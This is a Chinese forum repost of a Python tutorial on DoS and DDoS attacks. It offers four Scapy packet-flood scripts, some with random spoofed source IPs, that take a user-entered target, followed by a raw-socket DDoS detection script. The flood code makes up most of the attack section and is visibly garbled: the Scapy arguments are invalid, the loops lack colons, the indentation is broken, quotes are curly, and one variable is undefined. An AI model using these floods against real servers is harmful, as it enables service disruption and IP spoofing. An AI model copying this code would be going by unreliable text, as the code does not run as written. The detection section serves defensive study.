Python DoS&DDoS攻击


DoS&DDoS攻击


在本章中,我们将了解DoS和DdoS攻击,并了解如何检测它们。

随着电子商务行业的蓬勃发展,Web服务器现在容易受到攻击,并且是黑客的一个容易攻击的目标。黑客通常会尝试两种类型的攻击 -

  • DoS(拒绝服务)
  • DDoS(分布式拒绝服务)

DoS(拒绝服务)攻击

拒绝服务(DoS)攻击是黑客企图使网络资源不可用的一种尝试。它通常会临时或无限地中断主机,它连接到Internet。这些攻击通常针对托管在关键任务Web服务器(如银行,信用卡支付网关)上的服务。

DoS攻击的症状

  • 网络性能异常缓慢。

  • 特定网站不可用。

  • 无法访问任何网站。

  • 收到的垃圾邮件数量大幅增加。

  • 长期拒绝访问网络或任何互联网服务。

  • 特定网站不可用。


DoS攻击的类型及其Python实现

DoS攻击可以在数据链路,网络或应用层实施。现在让我们了解不同类型的DoS攻击&; 他们在Python中的实现 -

单IP单端口

使用单个IP和单个端口号将大量数据包发送到Web服务器。这是一种低级攻击,用于检查Web服务器的行为。它在Python中的实现可以在Scapy的帮助下完成。以下python脚本将有助于实现单IP单端口DoS攻击 -

from scapy.all import *source_IP = input("Enter IP address of Source: ")target_IP = input("Enter IP address of Target: ")source_port = int(input("Enter Source Port Number:"))i = 1while True:
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt, inter = .001)
   
   print ("packet sent ", i)
      i = i + 1


执行后,上述脚本将要求以下三件事 -

  • 源和目标的IP地址。

  • 源端口号的IP地址。

  • 然后,它将向服务器发送大量数据包以检查其行为。

单IP多端口

通过使用单个IP和多个端口将大量数据包发送到Web服务器。它在Python中的实现可以在Scapy的帮助下完成。以下python脚本将有助于实现单IP多端口DoS攻击 -

from scapy.all import *source_IP = input("Enter IP address of Source: ")target_IP = input("Enter IP address of Target: ")i = 1while True:
   for source_port in range(1, 65535)
      IP1 = IP(source_IP = source_IP, destination = target_IP)
      TCP1 = TCP(srcport = source_port, dstport = 80)
      pkt = IP1 / TCP1
      send(pkt, inter = .001)
      
      print ("packet sent ", i)
         i = i + 1


多个IP单端口

通过使用多个IP和单个端口号将大量数据包发送到Web服务器。它在Python中的实现可以在Scapy的帮助下完成。以下Python脚本实现单IP多端口DoS攻击 -

from scapy.all import *target_IP = input("Enter IP address of Target: ")source_port = int(input("Enter Source Port Number:"))i = 1while True:
   a = str(random.randint(1,254))
   b = str(random.randint(1,254))
   c = str(random.randint(1,254))
   d = str(random.randint(1,254))
   dot = “.”
   
   Source_ip = a + dot + b + dot + c + dot + d
   IP1 = IP(source_IP = source_IP, destination = target_IP)
   TCP1 = TCP(srcport = source_port, dstport = 80)
   pkt = IP1 / TCP1
   send(pkt,inter = .001)
   print ("packet sent ", i)
      i = i + 1


多个IP多端口

通过使用多个IP和多个端口将大量数据包发送到Web服务器。它在Python中的实现可以在Scapy的帮助下完成。以下Python脚本有助于实现多个IP多端口DoS攻击 -

Import randomfrom scapy.all import *target_IP = input("Enter IP address of Target: ")i = 1while True:
   a = str(random.randint(1,254))
   b = str(random.randint(1,254))
   c = str(random.randint(1,254))
   d = str(random.randint(1,254))
   dot = “.”
   Source_ip = a + dot + b + dot + c + dot + d   
   for source_port in range(1, 65535)
      IP1 = IP(source_IP = source_IP, destination = target_IP)
      TCP1 = TCP(srcport = source_port, dstport = 80)
      pkt = IP1 / TCP1
      send(pkt,inter = .001)
      
      print ("packet sent ", i)
         i = i + 1


DDoS(分布式拒绝服务)攻击

分布式拒绝服务(DDoS)攻击是指通过从多个源生成的大量流量超载来使在线服务或网站不可用的尝试。

与拒绝服务(DoS)攻击不同,其中一台计算机和一台Internet连接用于使用数据包来淹没目标资源,DDoS攻击使用许多计算机和许多Internet连接,这些连接通常在全球分布在所谓的僵尸网络中。大规模的体积DDoS攻击可以产生每秒数十吉比特(甚至数百千兆比特)的流量。可以在https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm上详细阅读

使用Python检测DDoS

实际上DDoS攻击有点难以检测,因为您不知道发送流量的主机是假的还是真实的。下面给出的Python脚本将有助于检测DDoS攻击。

首先,让我们导入必要的库 -

import socket
import struct

from datetime import datetime


现在,我们将创建一个我们在前面部分中创建的套接字。

s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)


我们将使用一个空字典 -

dict = {}


以下代码行将打开一个文本文件,其中包含附加模式下DDoS攻击的详细信息。

file_txt = open("attack_DDoS.txt",'a')t1 = str(datetime.now())


在下面的代码行的帮助下,只要程序运行,就会写入当前时间。

file_txt.writelines(t1)file_txt.writelines("\n")


现在,我们需要假设来自特定IP的命中。在这里,我们假设如果一个特定的IP击中超过15次,那么它将是一次攻击。

No_of_IPs = 15R_No_of_IPs = No_of_IPs +10
   while True:
      pkt = s.recvfrom(2048)
      ipheader = pkt[0][14:34]
      ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
      IP = socket.inet_ntoa(ip_hdr[3])
      print "The Source of the IP is:", IP


以下代码行将检查IP是否存在于字典中。如果它存在则会增加1。

if dict.has_key(IP):
   dict[IP] = dict[IP]+1
   print dict[IP]


下一行代码用于删除冗余。

if(dict[IP] > No_of_IPs) and (dict[IP] < R_No_of_IPs) :
   line = "DDOS attack is Detected: "
   file_txt.writelines(line)
   file_txt.writelines(IP)
   file_txt.writelines("\n")else:
   dict[IP] = 1


运行上面的脚本后,我们将在文本文件中获取结果。根据该脚本,如果IP命中超过15次,那么它将被打印,因为检测到DDoS攻击以及该IP地址。


温馨提示:欢迎注册本站!



网际编程技术论坛-微蓝网-aiweline.com- 版权声明 1、本主题所有言论和图片纯属会员个人意见,与网际编程技术论坛-微蓝网-aiweline.com立场无关。
2、本站所有主题由该帖子作者发表,该帖子作者Python网际编程技术论坛-微蓝网-aiweline.com享有帖子相关版权。
3、网际编程技术论坛-微蓝网-aiweline.com管理员和版主有权不事先通知发贴者而删除本文。
4、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者Python网际编程技术论坛-微蓝网-aiweline.com的同意。
5、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任。
6、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
7、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意。


上一篇:Python渗透测试-ARP欺骗
下一篇:Python渗透测试 - SQLi Web攻击-SQL注入攻击
快速回复
这家伙太懒了,什么也没留下。
最新回复 (0)
只看楼主
全部楼主
    • 网际编程技术论坛-微蓝网-aiweline.com
      2
          
返回
免责声明:本站部分内容来源于网络,若有侵权请及时通知(aiweline@qq.com),我们会及时处理。